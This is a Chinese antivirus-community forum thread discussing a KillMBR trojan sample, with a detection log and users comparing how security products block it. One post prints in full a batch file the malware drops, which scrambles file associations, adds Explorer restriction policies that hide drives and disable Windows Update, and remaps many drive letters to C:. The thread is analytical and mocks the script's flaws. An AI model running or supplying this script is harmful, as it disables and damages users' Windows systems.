FlyStudio 1x

吃瓜群众第123位

360企业安全云 落地杀

heavencc

小a

取名字难

事件: 对象已删除
用户: DESKTOP-FJL2B1H\q
用户类型: 发起者
应用程序名称: explorer.exe
应用程序路径: C:\Windows
组件: 文件反病毒
结果说明: 已删除
类型: 木马
名称: Trojan.Win32.KillMBR.hks
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: 爱的人间.exe
对象路径: C:\Users\qzsdbjbdn\Downloads\爱的人间
对象的 MD5: 408A2126B99410C765AFFAEEE0C099ED

OCTONAUTS

DisaPDB 发表于 2024-4-12 14:01
KillMBR组件被本地入库了（笑）
这得多老

当KillMBR组件被释放出来的时候，病毒已经改了许多的注册表项了（包括但不限于禁用任务管理器，注册表编辑器，添加自己到自启动项，删除DiskUpperFilters等等）

DisaPDB

OCTONAUTS 发表于 2024-4-12 21:14
当KillMBR组件被释放出来的时候，病毒已经改了许多的注册表项了（包括但不限于禁用任务管理器，注册表编 ...

太直球了，单步全拦

biue

OCTONAUTS

DisaPDB 发表于 2024-4-12 21:52
太直球了，单步全拦

映像劫持能不能拦住？？

DisaPDB

OCTONAUTS 发表于 2024-4-15 11:58
映像劫持能不能拦住？？

不能拦就有鬼了

OCTONAUTS

DisaPDB 发表于 2024-4-15 12:00
不能拦就有鬼了

这个病毒没有这么简单，albumartsmall.bat后面还会释放一个叫做Folder.bat的文件
那个BAT应该是用于创建那些奇怪的文件夹的

DisaPDB

OCTONAUTS 发表于 2024-4-15 13:41
这个病毒没有这么简单，albumartsmall.bat后面还会释放一个叫做Folder.bat的文件
那个BAT应该是用于创建 ...

我提取出来看看就知道了
内容如下：

1. @echo off
   
2. assoc .txt=exefile
   
3. assoc .exe=txtfile
   
4. assoc .htm=exefile
   
5. assoc .html=exefile
   
6. assoc .com=txtfile
   
7. assoc .gho=txtfile
   
8. assoc .rar=txtfile
   
9. assoc .zip=txtfile
   
10. assoc .chm=txtfile
    
11. assoc .jpg=txtfile
    
12. assoc .doc=exefile
    
13. assoc .ppt=txtfile
    
14. assoc .vbs=txtfile
    
15. assoc .cmd=txtfile
    
16. assoc .bmp=txtfile
    
17. assoc .gif=txtfile
    
18. assoc .ico=txtfile
    
19. assoc .png=txtfile
    
20. assoc .jpeg=txtfile
    
21. assoc .jpe=txtfile
    
22. assoc .jfif=txtfile
    
23. assoc .fla=txtfile
    
24. assoc .swf=txtfile
    
25. assoc .avi=txtfile
    
26. assoc .mov=txtfile
    
27. assoc .asf=txtfile
    
28. assoc .wmv=txtfile
    
29. assoc .rm=txtfile
    
30. assoc .ra=txtfile
    
31. assoc .mvb=txtfile
    
32. assoc .flv=txtfile
    
33. assoc .mpg=txtfile
    
34. assoc .wav=txtfile
    
35. assoc .mpeg=txtfile
    
36. assoc .mp3=txtfile
    
37. assoc .mp4=txtfile
    
38. assoc .3gp=txtfile
    
39. assoc .msi=txtfile
    
40. assoc .bat=txtfile
    
41. assoc .3g2=txtfile
    
42. assoc .dat=txtfile
    
43. reg add
    
44. HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
    
45. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
    
46. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
    
47. subst b: C:\
    
48. subst h: C:\
    
49. subst i: C:\
    
50. subst j: C:\
    
51. subst l: C:\
    
52. subst m: C:\
    
53. subst n: C:\
    
54. subst o: C:\
    
55. subst r: C:\
    
56. subst t: C:\
    
57. subst k: C:\
    
58. subst p: C:\
    
59. subst q: C:\
    
60. subst s: C:\
    
61. subst u: C:\
    
62. subst v: C:\
    
63. subst w: C:\
    
64. subst x: C:\
    
65. subst y: C:\
    
66. subst z: C:\
    
67. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
    
68. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
    
69. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    
70. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 01000000 /f
    
71. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
    
72. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
    
73. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
    
74. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f

复制代码

谁拦截不了我笑话谁
而且还写得一堆问题